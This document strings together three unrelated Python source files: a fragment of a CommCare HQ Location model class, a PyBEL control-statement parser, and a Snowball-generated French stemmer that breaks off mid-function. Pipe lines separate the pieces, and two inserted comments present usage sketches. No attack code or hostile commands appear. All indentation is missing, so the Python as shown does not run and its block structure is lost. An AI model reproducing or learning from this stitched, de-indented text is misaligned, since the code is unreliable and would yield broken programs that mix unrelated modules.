# that added this in iso_format() without Z, then add a Z
# (See also Group class)
from corehq.apps.groups.models import dt_no_Z_re
if last_modified and dt_no_Z_re.match(last_modified):
data['last_modified'] += 'Z'
return super(Location, cls).wrap(data)
def __init__(self, *args, **kwargs):
from corehq.apps.locations.util import get_lineage_from_location, get_lineage_from_location_id
if 'parent' in kwargs:
parent = kwargs['parent']
if parent:
if isinstance(parent, Document):
lineage = get_lineage_from_location(parent)
else:
# 'parent' is a doc id
lineage = get_lineage_from_location_id(parent)
else:
lineage = []
kwargs['lineage'] = lineage
del kwargs['parent']
location_type = kwargs.pop('location_type', None)
super(Document, self).__init__(*args, **kwargs)
if location_type:
self.set_location_type(location_type)
def __unicode__(self):
return u"{} ({})".format(self.name, self.domain)
def __repr__(self):
return u"Location(domain='{}', name='{}', location_type='{}')".format(
self.domain,
self.name,
self.location_type_name,
).encode('utf-8')
def __eq__(self, other):
if isinstance(other, Location):
return self._id == other._id
else:
return False
def __hash__(self):
return hash(self._id)
@property
def sql_location(self):
return (SQLLocation.objects.prefetch_related('location_type')
.get(location_id=self._id))
@property
def location_id(self):
return self._id
@property
def location_type(self):
notify_of_deprecation(
"You should use either location_type_name or location_type_object")
return self.location_type_object.name
_sql_location_type = None
@location_type.setter
def location_type(self, value):
notify_of_deprecation("You should set location_type using `set_location_type`")
self.set_location_type(value)
def set_location_type(self, location_type_name):
msg = "You can't create a location without a real location type"
if not location_type_name:
raise LocationType.DoesNotExist(msg)
try:
self._sql_location_type = LocationType.objects.get(
domain=self.domain,
name=location_type_name,
)
except LocationType.DoesNotExist:
raise LocationType.DoesNotExist(msg)
@classmethod
def _migration_get_fields(cls):
return ["domain", "name", "site_code", "external_id", "metadata",
"is_archived", "latitude", "longitude"]
@classmethod
def _migration_get_sql_model_class(cls):
return SQLLocation
def _migration_do_sync(self):
sql_location = self._migration_get_or_create_sql_object()
location_type = self._sql_location_type or sql_location.location_type
sql_location.location_type = location_type
# sync parent connection
sql_location.parent = (SQLLocation.objects.get(location_id=self.parent_location_id)
if self.parent_location_id else None)
self._migration_sync_to_sql(sql_location)
def save(self, *args, **kwargs):
self.last_modified = datetime.utcnow()
# lazy migration for site_code
if not self.site_code:
from corehq.apps.commtrack.util import generate_code
all_codes = [
code.lower() for code in
(SQLLocation.objects.filter(domain=self.domain)
.values_list('site_code', flat=True))
]
self.site_code = generate_code(self.name, all_codes)
# Set the UUID here so we can save to SQL first (easier to rollback)
if not self._id:
self._id = self.get_db().server.next_uuid()
sync_to_sql = kwargs.pop('sync_to_sql', True)
kwargs['sync_to_sql'] = False # only sync here
with transaction.atomic():
if sync_to_sql:
self._migration_do_sync()
super(Location, self).save(*args, **kwargs)
@classmethod
def filter_by_type(cls, domain, loc_type, root_loc=None):
if root_loc:
query = root_loc.sql_location.get_descendants(include_self=True)
else:
query = SQLLocation.objects
ids = (query.filter(domain=domain, location_type__name=loc_type)
.location_ids())
return (
cls.wrap(l) for l in iter_docs(cls.get_db(), list(ids))
if not l.get('is_archived', False)
)
@classmethod
def by_domain(cls, domain, include_docs=True):
relevant_ids = SQLLocation.objects.filter(domain=domain).location_ids()
if not include_docs:
return relevant_ids
else:
return (
cls.wrap(l) for l in iter_docs(cls.get_db(), list(relevant_ids))
if not l.get('is_archived', False)
)
@classmethod
def by_site_code(cls, domain, site_code):
"""
This method directly looks up a single location
and can return archived locations.
"""
try:
return (SQLLocation.objects.get(domain=domain,
site_code__iexact=site_code)
.couch_location)
except (SQLLocation.DoesNotExist, ResourceNotFound):
return None
@classmethod
def root_locations(cls, domain):
"""
Return all active top level locations for this domain
"""
return list(SQLLocation.root_locations(domain).couch_locations())
@property
def is_root(self):
return not self.lineage
@property
def parent_location_id(self):
if self.is_root:
return None
return self.lineage[0]
@property
def parent_id(self):
# TODO this is deprecated as of 2016-07-19
# delete after we're sure this isn't called dynamically
# Django automagically reserves field_name+_id for foreign key fields,
# so because we have SQLLocation.parent, SQLLocation.parent_id refers
# to the Django primary key
notify_of_deprecation("parent_id should be replaced by parent_location_id")
return self.parent_location_id
@property
def parent(self):
parent_id = self.parent_location_id
return Location.get(parent_id) if parent_id else None
@property
def path(self):
_path = list(reversed(self.lineage))
_path.append(self._id)
return _path
@property
def descendants(self):
"""return list of all locations that have this location as an ancestor"""
return list(self.sql_location.get_descendants().couch_locations())
def get_children(self):
"""return list of immediate children of this location"""
return self.sql_location.get_children().couch_locations()
def linked_supply_point(self):
return self.sql_location.linked_supply_point()
@property
def group_id(self):
"""
This just returns the location's id. It used to add
a prefix.
"""
return self.location_id
@property
def location_type_object(self):
return self._sql_location_type or self.sql_location.location_type
@property
def location_type_name(self):
return self.location_type_object.name
def _unassign_users_from_location(domain, location_id):
"""
Unset location for all users assigned to that location.
"""
from corehq.apps.locations.dbaccessors import get_all_users_by_location
for user in get_all_users_by_location(domain, location_id):
if user.is_web_user():
user.unset_location_by_id(domain, location_id, fall_back_to_next=True)
elif user.is_commcare_user():
user.unset_location_by_id(location_id, fall_back_to_next=True)
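# Illustrative usage sketch (not part of the original module): the lookup
# helpers above route through the SQLLocation mirror before wrapping the
# couch document. The domain and site code below are placeholders.
#
#     loc = Location.by_site_code("example-domain", "site-001")
#     if loc is not None:
#         children = loc.get_children()
#         roots = Location.root_locations("example-domain")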
|
|
# -*- coding: utf-8 -*-
"""Control parser.
This module handles parsing control statements, which add annotations and namespaces to the document.
.. seealso::
https://wiki.openbel.org/display/BLD/Control+Records
"""
import logging
from typing import Any, Dict, List, Mapping, Optional, Pattern, Set
from pyparsing import And, Keyword, MatchFirst, ParseResults, Suppress, oneOf
from pyparsing import pyparsing_common as ppc
from .baseparser import BaseParser
from .utils import delimited_quoted_list, delimited_unquoted_list, is_int, qid, quote
from .. import constants as pc
from ..constants import (
ANNOTATIONS,
BEL_KEYWORD_ALL,
BEL_KEYWORD_CITATION,
BEL_KEYWORD_EVIDENCE,
BEL_KEYWORD_SET,
BEL_KEYWORD_STATEMENT_GROUP,
BEL_KEYWORD_SUPPORT,
BEL_KEYWORD_UNSET,
CITATION,
CITATION_TYPES,
EVIDENCE,
)
from ..exceptions import (
CitationTooLongException,
CitationTooShortException,
IllegalAnnotationValueWarning,
InvalidCitationType,
InvalidPubMedIdentifierWarning,
MissingAnnotationKeyWarning,
MissingAnnotationRegexWarning,
MissingCitationException,
UndefinedAnnotationWarning,
)
from ..language import CitationDict, Entity
__all__ = ["ControlParser"]
logger = logging.getLogger(__name__)
set_tag = Keyword(BEL_KEYWORD_SET)
unset_tag = Keyword(BEL_KEYWORD_UNSET)
unset_all = Suppress(BEL_KEYWORD_ALL)
supporting_text_tags = oneOf([BEL_KEYWORD_EVIDENCE, BEL_KEYWORD_SUPPORT])
set_statement_group_stub = And([Suppress(BEL_KEYWORD_STATEMENT_GROUP), Suppress("="), qid("group")])
set_citation_stub = And([Suppress(BEL_KEYWORD_CITATION), Suppress("="), delimited_quoted_list("values")])
set_evidence_stub = And([Suppress(supporting_text_tags), Suppress("="), quote("value")])
class ControlParser(BaseParser):
"""A parser for BEL control statements.
.. seealso::
BEL 1.0 specification on `control records
<http://openbel.org/language/version_1.0/bel_specification_version_1.0.html#_control_records>`_
"""
def __init__(
self,
annotation_to_term: Optional[Mapping[str, Set[str]]] = None,
annotation_to_pattern: Optional[Mapping[str, Pattern]] = None,
annotation_to_local: Optional[Mapping[str, Set[str]]] = None,
citation_clearing: bool = True,
required_annotations: Optional[List[str]] = None,
) -> None:
"""Initialize the control statement parser.
:param annotation_to_term: A dictionary of {annotation: set of valid values} defined with URL for parsing
:param annotation_to_pattern: A dictionary of {annotation: regular expression string}
:param annotation_to_local: A dictionary of {annotation: set of valid values} for parsing defined with LIST
:param citation_clearing: Should :code:`SET Citation` statements clear evidence and all annotations?
:param required_annotations: Annotations that are required
"""
self.citation_clearing = citation_clearing
self.annotation_to_term = annotation_to_term or {}
self.annotation_to_pattern = annotation_to_pattern or {}
self.annotation_to_local = annotation_to_local or {}
self.statement_group = None
self.citation_db = None
self.citation_db_id = None
self.evidence = None
self.annotations = {}
self.required_annotations = required_annotations or []
annotation_key = ppc.identifier("key").setParseAction(self.handle_annotation_key)
self.set_statement_group = set_statement_group_stub().setParseAction(self.handle_set_statement_group)
self.set_citation = set_citation_stub.setParseAction(self.handle_set_citation)
self.set_evidence = set_evidence_stub.setParseAction(self.handle_set_evidence)
set_command_prefix = And([annotation_key("key"), Suppress("=")])
self.set_command = set_command_prefix + qid("value")
self.set_command.setParseAction(self.handle_set_command)
self.set_command_list = set_command_prefix + delimited_quoted_list("values")
self.set_command_list.setParseAction(self.handle_set_command_list)
self.unset_command = annotation_key("key")
self.unset_command.addParseAction(self.handle_unset_command)
self.unset_evidence = supporting_text_tags(EVIDENCE)
self.unset_evidence.setParseAction(self.handle_unset_evidence)
self.unset_citation = Suppress(BEL_KEYWORD_CITATION)
self.unset_citation.setParseAction(self.handle_unset_citation)
self.unset_statement_group = Suppress(BEL_KEYWORD_STATEMENT_GROUP)
self.unset_statement_group.setParseAction(self.handle_unset_statement_group)
self.unset_list = delimited_unquoted_list("values")
self.unset_list.setParseAction(self.handle_unset_list)
self.unset_all = unset_all.setParseAction(self.handle_unset_all)
self.set_statements = set_tag("action") + MatchFirst(
[
self.set_statement_group,
self.set_citation,
self.set_evidence,
self.set_command,
self.set_command_list,
]
)
self.unset_statements = unset_tag("action") + MatchFirst(
[
self.unset_all,
self.unset_citation,
self.unset_evidence,
self.unset_statement_group,
self.unset_command,
self.unset_list,
]
)
self.language = self.set_statements | self.unset_statements
super(ControlParser, self).__init__(self.language)
@property
def _in_debug_mode(self) -> bool:
return not self.annotation_to_term and not self.annotation_to_pattern
@property
def citation_is_set(self) -> bool:
"""Check if the citation is set."""
return self.citation_db is not None and self.citation_db_id is not None
def has_enumerated_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined as an enumeration."""
return annotation in self.annotation_to_term
def has_regex_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined as a regular expression."""
return annotation in self.annotation_to_pattern
def has_local_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined locally."""
return annotation in self.annotation_to_local
def has_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined."""
return (
self.has_enumerated_annotation(annotation)
or self.has_regex_annotation(annotation)
or self.has_local_annotation(annotation)
)
def raise_for_undefined_annotation(self, line: str, position: int, annotation: str) -> None:
"""Raise an exception if the annotation is not defined.
:raises: UndefinedAnnotationWarning
"""
if self._in_debug_mode:
return
if not self.has_annotation(annotation):
raise UndefinedAnnotationWarning(self.get_line_number(), line, position, annotation)
def raise_for_invalid_annotation_value(self, line: str, position: int, key: str, value: str) -> None:
"""Raise an exception if the annotation is not defined.
:raises: IllegalAnnotationValueWarning or MissingAnnotationRegexWarning
"""
if self._in_debug_mode:
return
if self.has_enumerated_annotation(key) and value not in self.annotation_to_term[key]:
raise IllegalAnnotationValueWarning(self.get_line_number(), line, position, key, value)
elif self.has_regex_annotation(key) and not self.annotation_to_pattern[key].match(value):
raise MissingAnnotationRegexWarning(self.get_line_number(), line, position, key, value)
elif self.has_local_annotation(key) and value not in self.annotation_to_local[key]: # TODO condense
raise IllegalAnnotationValueWarning(self.get_line_number(), line, position, key, value)
def raise_for_missing_citation(self, line: str, position: int) -> None:
"""Raise an exception if there is no citation present in the parser.
:raises: MissingCitationException
"""
if self.citation_clearing and not self.citation_is_set:
raise MissingCitationException(self.get_line_number(), line, position)
def handle_annotation_key(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle an annotation key before parsing to validate that it's either enumerated or as a regex.
:raise: MissingCitationException or UndefinedAnnotationWarning
"""
key = tokens["key"]
self.raise_for_missing_citation(line, position)
self.raise_for_undefined_annotation(line, position, key)
return tokens
def handle_set_statement_group(self, _, __, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET STATEMENT_GROUP = "X"`` statement."""
self.statement_group = tokens["group"]
return tokens
def handle_set_citation(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET Citation = {"X", "Y", "Z", ...}`` statement."""
self.clear_citation()
values = tokens["values"]
if len(values) < 2:
raise CitationTooShortException(self.get_line_number(), line, position)
citation_namespace = values[0].lower()
citation_namespace = pc.CITATION_NORMALIZER.get(citation_namespace, citation_namespace)
if citation_namespace not in CITATION_TYPES:
raise InvalidCitationType(self.get_line_number(), line, position, citation_namespace)
if 2 == len(values):
citation_db_id = values[1]
elif 6 < len(values):
raise CitationTooLongException(self.get_line_number(), line, position)
else:
if 3 == len(values):
logger.debug("Throwing away JOURNAL entry in position 2")
else:
logger.debug("Throwing away JOURNAL entry in position 2 and everything after position 3")
citation_db_id = values[2]
if citation_namespace == "pubmed" and not is_int(citation_db_id):
raise InvalidPubMedIdentifierWarning(self.get_line_number(), line, position, citation_db_id)
self.citation_db = citation_namespace
self.citation_db_id = citation_db_id
return tokens
def handle_set_evidence(self, _, __, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET Evidence = ""`` statement."""
self.evidence = tokens["value"]
return tokens
def handle_set_command(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET X = "Y"`` statement."""
key, value = tokens["key"], tokens["value"]
self.raise_for_invalid_annotation_value(line, position, key, value)
self.annotations[key] = [Entity(namespace=key, identifier=value)]
return tokens
def handle_set_command_list(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET X = {"Y", "Z", ...}`` statement."""
key, values = tokens["key"], tokens["values"]
for value in values:
self.raise_for_invalid_annotation_value(line, position, key, value)
self.annotations[key] = [Entity(namespace=key, identifier=value) for value in values]
return tokens
def handle_unset_statement_group(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the statement group, or raises an exception if it is not set.
:raises: MissingAnnotationKeyWarning
"""
if self.statement_group is None:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, BEL_KEYWORD_STATEMENT_GROUP)
self.statement_group = None
return tokens
def handle_unset_citation(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the citation, or raise an exception if it is not set.
:raises: MissingAnnotationKeyWarning
"""
if not self.citation_is_set:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, BEL_KEYWORD_CITATION)
self.clear_citation()
return tokens
def handle_unset_evidence(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the evidence, or throws an exception if it is not already set.
The value for ``tokens[EVIDENCE]`` corresponds to which alternate of SupportingText or Evidence was used in
the BEL script.
:raises: MissingAnnotationKeyWarning
"""
if self.evidence is None:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, tokens[EVIDENCE])
self.evidence = None
return tokens
def validate_unset_command(self, line: str, position: int, annotation: str) -> None:
"""Raise an exception when trying to ``UNSET X`` if ``X`` is not already set.
:raises: MissingAnnotationKeyWarning
"""
if annotation not in self.annotations:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, annotation)
def handle_unset_command(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle an ``UNSET X`` statement or raises an exception if it is not already set.
:raises: MissingAnnotationKeyWarning
"""
key = tokens["key"]
self.validate_unset_command(line, position, key)
del self.annotations[key]
return tokens
def handle_unset_list(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle ``UNSET {A, B, ...}`` or raises an exception of any of them are not present.
Consider that all unsets are in peril if just one of them is wrong!
:raises: MissingAnnotationKeyWarning
"""
for key in tokens["values"]:
if key in {BEL_KEYWORD_EVIDENCE, BEL_KEYWORD_SUPPORT}:
self.evidence = None
else:
self.validate_unset_command(line, position, key)
del self.annotations[key]
return tokens
def handle_unset_all(self, _, __, tokens) -> ParseResults:
"""Handle an ``UNSET_ALL`` statement."""
self.clear()
return tokens
def get_annotations(self) -> Dict[str, Any]:
"""Get the current annotations."""
return {
EVIDENCE: self.evidence,
CITATION: self.get_citation(),
ANNOTATIONS: self.annotations.copy(),
}
def get_citation(self) -> Optional[CitationDict]:
"""Get the citation dictionary."""
return (
CitationDict(namespace=self.citation_db, identifier=self.citation_db_id)
if self.citation_db and self.citation_db_id
else None
)
def get_missing_required_annotations(self) -> List[str]:
"""Return missing required annotations."""
return [
required_annotation
for required_annotation in self.required_annotations
if required_annotation not in self.annotations
]
def clear_citation(self) -> None:
"""Clear the citation and if citation clearing is enabled, clear the evidence and annotations."""
self.citation_db = None
self.citation_db_id = None
if self.citation_clearing:
self.evidence = None
self.annotations.clear()
def clear(self) -> None:
"""Clear the statement_group, citation, evidence, and annotations."""
self.statement_group = None
self.citation_db = None
self.citation_db_id = None
self.evidence = None
self.annotations.clear()
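# Illustrative usage sketch (not part of the original module): control lines
# are fed to the parser one at a time. The entry point is assumed to be the
# pyparsing-style ``parseString`` inherited from ``BaseParser``.
#
#     parser = ControlParser()
#     parser.parseString('SET Citation = {"PubMed", "12345678"}')
#     parser.parseString('SET Evidence = "Example supporting text"')
#     parser.get_annotations()  # -> {EVIDENCE: ..., CITATION: ..., ANNOTATIONS: {}}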
|
|
# Generated by Snowball 2.1.0 - https://snowballstem.org/
from .basestemmer import BaseStemmer
from .among import Among
class FrenchStemmer(BaseStemmer):
'''
This class implements the stemming algorithm defined by a snowball script.
Generated by Snowball 2.1.0 - https://snowballstem.org/
'''
a_0 = [
Among(u"col", -1, -1),
Among(u"par", -1, -1),
Among(u"tap", -1, -1)
]
a_1 = [
Among(u"", -1, 7),
Among(u"H", 0, 6),
Among(u"He", 1, 4),
Among(u"Hi", 1, 5),
Among(u"I", 0, 1),
Among(u"U", 0, 2),
Among(u"Y", 0, 3)
]
a_2 = [
Among(u"iqU", -1, 3),
Among(u"abl", -1, 3),
Among(u"I\u00E8r", -1, 4),
Among(u"i\u00E8r", -1, 4),
Among(u"eus", -1, 2),
Among(u"iv", -1, 1)
]
a_3 = [
Among(u"ic", -1, 2),
Among(u"abil", -1, 1),
Among(u"iv", -1, 3)
]
a_4 = [
Among(u"iqUe", -1, 1),
Among(u"atrice", -1, 2),
Among(u"ance", -1, 1),
Among(u"ence", -1, 5),
Among(u"logie", -1, 3),
Among(u"able", -1, 1),
Among(u"isme", -1, 1),
Among(u"euse", -1, 11),
Among(u"iste", -1, 1),
Among(u"ive", -1, 8),
Among(u"if", -1, 8),
Among(u"usion", -1, 4),
Among(u"ation", -1, 2),
Among(u"ution", -1, 4),
Among(u"ateur", -1, 2),
Among(u"iqUes", -1, 1),
Among(u"atrices", -1, 2),
Among(u"ances", -1, 1),
Among(u"ences", -1, 5),
Among(u"logies", -1, 3),
Among(u"ables", -1, 1),
Among(u"ismes", -1, 1),
Among(u"euses", -1, 11),
Among(u"istes", -1, 1),
Among(u"ives", -1, 8),
Among(u"ifs", -1, 8),
Among(u"usions", -1, 4),
Among(u"ations", -1, 2),
Among(u"utions", -1, 4),
Among(u"ateurs", -1, 2),
Among(u"ments", -1, 15),
Among(u"ements", 30, 6),
Among(u"issements", 31, 12),
Among(u"it\u00E9s", -1, 7),
Among(u"ment", -1, 15),
Among(u"ement", 34, 6),
Among(u"issement", 35, 12),
Among(u"amment", 34, 13),
Among(u"emment", 34, 14),
Among(u"aux", -1, 10),
Among(u"eaux", 39, 9),
Among(u"eux", -1, 1),
Among(u"it\u00E9", -1, 7)
]
a_5 = [
Among(u"ira", -1, 1),
Among(u"ie", -1, 1),
Among(u"isse", -1, 1),
Among(u"issante", -1, 1),
Among(u"i", -1, 1),
Among(u"irai", 4, 1),
Among(u"ir", -1, 1),
Among(u"iras", -1, 1),
Among(u"ies", -1, 1),
Among(u"\u00EEmes", -1, 1),
Among(u"isses", -1, 1),
Among(u"issantes", -1, 1),
Among(u"\u00EEtes", -1, 1),
Among(u"is", -1, 1),
Among(u"irais", 13, 1),
Among(u"issais", 13, 1),
Among(u"irions", -1, 1),
Among(u"issions", -1, 1),
Among(u"irons", -1, 1),
Among(u"issons", -1, 1),
Among(u"issants", -1, 1),
Among(u"it", -1, 1),
Among(u"irait", 21, 1),
Among(u"issait", 21, 1),
Among(u"issant", -1, 1),
Among(u"iraIent", -1, 1),
Among(u"issaIent", -1, 1),
Among(u"irent", -1, 1),
Among(u"issent", -1, 1),
Among(u"iront", -1, 1),
Among(u"\u00EEt", -1, 1),
Among(u"iriez", -1, 1),
Among(u"issiez", -1, 1),
Among(u"irez", -1, 1),
Among(u"issez", -1, 1)
]
a_6 = [
Among(u"a", -1, 3),
Among(u"era", 0, 2),
Among(u"asse", -1, 3),
Among(u"ante", -1, 3),
Among(u"\u00E9e", -1, 2),
Among(u"ai", -1, 3),
Among(u"erai", 5, 2),
Among(u"er", -1, 2),
Among(u"as", -1, 3),
Among(u"eras", 8, 2),
Among(u"\u00E2mes", -1, 3),
Among(u"asses", -1, 3),
Among(u"antes", -1, 3),
Among(u"\u00E2tes", -1, 3),
Among(u"\u00E9es", -1, 2),
Among(u"ais", -1, 3),
Among(u"erais", 15, 2),
Among(u"ions", -1, 1),
Among(u"erions", 17, 2),
Among(u"assions", 17, 3),
Among(u"erons", -1, 2),
Among(u"ants", -1, 3),
Among(u"\u00E9s", -1, 2),
Among(u"ait", -1, 3),
Among(u"erait", 23, 2),
Among(u"ant", -1, 3),
Among(u"aIent", -1, 3),
Among(u"eraIent", 26, 2),
Among(u"\u00E8rent", -1, 2),
Among(u"assent", -1, 3),
Among(u"eront", -1, 2),
Among(u"\u00E2t", -1, 3),
Among(u"ez", -1, 2),
Among(u"iez", 32, 2),
Among(u"eriez", 33, 2),
Among(u"assiez", 33, 3),
Among(u"erez", 32, 2),
Among(u"\u00E9", -1, 2)
]
a_7 = [
Among(u"e", -1, 3),
Among(u"I\u00E8re", 0, 2),
Among(u"i\u00E8re", 0, 2),
Among(u"ion", -1, 1),
Among(u"Ier", -1, 2),
Among(u"ier", -1, 2)
]
a_8 = [
Among(u"ell", -1, -1),
Among(u"eill", -1, -1),
Among(u"enn", -1, -1),
Among(u"onn", -1, -1),
Among(u"ett", -1, -1)
]
g_v = [17, 65, 16, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 130, 103, 8, 5]
g_keep_with_s = [1, 65, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]
I_p2 = 0
I_p1 = 0
I_pV = 0
def __r_prelude(self):
while True:
v_1 = self.cursor
try:
try:
while True:
v_2 = self.cursor
try:
try:
v_3 = self.cursor
try:
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.bra = self.cursor
try:
v_4 = self.cursor
try:
if not self.eq_s(u"u"):
raise lab6()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab6()
if not self.slice_from(u"U"):
return False
raise lab5()
except lab6: pass
self.cursor = v_4
try:
if not self.eq_s(u"i"):
raise lab7()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab7()
if not self.slice_from(u"I"):
return False
raise lab5()
except lab7: pass
self.cursor = v_4
if not self.eq_s(u"y"):
raise lab4()
self.ket = self.cursor
if not self.slice_from(u"Y"):
return False
except lab5: pass
raise lab3()
except lab4: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"\u00EB"):
raise lab8()
self.ket = self.cursor
if not self.slice_from(u"He"):
return False
raise lab3()
except lab8: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"\u00EF"):
raise lab9()
self.ket = self.cursor
if not self.slice_from(u"Hi"):
return False
raise lab3()
except lab9: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"y"):
raise lab10()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab10()
if not self.slice_from(u"Y"):
return False
raise lab3()
except lab10: pass
self.cursor = v_3
if not self.eq_s(u"q"):
raise lab2()
self.bra = self.cursor
if not self.eq_s(u"u"):
raise lab2()
self.ket = self.cursor
if not self.slice_from(u"U"):
return False
except lab3: pass
self.cursor = v_2
raise lab1()
except lab2: pass
self.cursor = v_2
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
except lab1: pass
continue
except lab0: pass
self.cursor = v_1
break
return True
def __r_mark_regions(self):
self.I_pV = self.limit
self.I_p1 = self.limit
self.I_p2 = self.limit
v_1 = self.cursor
try:
try:
v_2 = self.cursor
try:
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab2()
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab2()
if self.cursor >= self.limit:
raise lab2()
self.cursor += 1
raise lab1()
except lab2: pass
self.cursor = v_2
try:
if self.find_among(FrenchStemmer.a_0) == 0:
raise lab3()
raise lab1()
except lab3: pass
self.cursor = v_2
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab0()
self.cursor += 1
except lab1: pass
self.I_pV = self.cursor
except lab0: pass
self.cursor = v_1
v_3 = self.cursor
try:
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
if not self.go_in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
self.I_p1 = self.cursor
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
if not self.go_in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
self.I_p2 = self.cursor
except lab4: pass
self.cursor = v_3
return True
def __r_postlude(self):
while True:
v_1 = self.cursor
try:
self.bra = self.cursor
among_var = self.find_among(FrenchStemmer.a_1)
if among_var == 0:
raise lab0()
self.ket = self.cursor
if among_var == 1:
if not self.slice_from(u"i"):
return False
elif among_var == 2:
if not self.slice_from(u"u"):
return False
elif among_var == 3:
if not self.slice_from(u"y"):
return False
elif among_var == 4:
if not self.slice_from(u"\u00EB"):
return False
elif among_var == 5:
if not self.slice_from(u"\u00EF"):
return False
elif among_var == 6:
if not self.slice_del():
return False
else:
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
continue
except lab0: pass
self.cursor = v_1
break
return True
def __r_RV(self):
if not self.I_pV <= self.cursor:
return False
return True
def __r_R1(self):
if not self.I_p1 <= self.cursor:
return False
return True
def __r_R2(self):
if not self.I_p2 <= self.cursor:
return False
return True
def __r_standard_suffix(self):
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_4)
if among_var == 0:
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
return False
if not self.slice_del():
return False
elif among_var == 2:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"ic"):
self.cursor = self.limit - v_1
raise lab0()
self.bra = self.cursor
try:
v_2 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab2()
if not self.slice_del():
return False
raise lab1()
except lab2: pass
self.cursor = self.limit - v_2
if not self.slice_from(u"iqU"):
return False
except lab1: pass
except lab0: pass
elif among_var == 3:
if not self.__r_R2():
return False
if not self.slice_from(u"log"):
return False
elif among_var == 4:
if not self.__r_R2():
return False
if not self.slice_from(u"u"):
return False
elif among_var == 5:
if not self.__r_R2():
return False
if not self.slice_from(u"ent"):
return False
elif among_var == 6:
if not self.__r_RV():
return False
if not self.slice_del():
return False
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_2)
if among_var == 0:
self.cursor = self.limit - v_3
raise lab3()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
self.ket = self.cursor
if not self.eq_s_b(u"at"):
self.cursor = self.limit - v_3
raise lab3()
self.bra = self.cursor
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
elif among_var == 2:
try:
v_4 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab5()
if not self.slice_del():
return False
raise lab4()
except lab5: pass
self.cursor = self.limit - v_4
if not self.__r_R1():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_from(u"eux"):
return False
except lab4: pass
elif among_var == 3:
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
else:
if not self.__r_RV():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_from(u"i"):
return False
except lab3: pass
elif among_var == 7:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_5 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_3)
if among_var == 0:
self.cursor = self.limit - v_5
raise lab6()
self.bra = self.cursor
if among_var == 1:
try:
v_6 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab8()
if not self.slice_del():
return False
raise lab7()
except lab8: pass
self.cursor = self.limit - v_6
if not self.slice_from(u"abl"):
return False
except lab7: pass
elif among_var == 2:
try:
v_7 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab10()
if not self.slice_del():
return False
raise lab9()
except lab10: pass
self.cursor = self.limit - v_7
if not self.slice_from(u"iqU"):
return False
except lab9: pass
else:
if not self.__r_R2():
self.cursor = self.limit - v_5
raise lab6()
if not self.slice_del():
return False
except lab6: pass
elif among_var == 8:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_8 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"at"):
self.cursor = self.limit - v_8
raise lab11()
self.bra = self.cursor
if not self.__r_R2():
self.cursor = self.limit - v_8
raise lab11()
if not self.slice_del():
return False
self.ket = self.cursor
if not self.eq_s_b(u"ic"):
self.cursor = self.limit - v_8
raise lab11()
self.bra = self.cursor
try:
v_9 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab13()
if not self.slice_del():
return False
raise lab12()
except lab13: pass
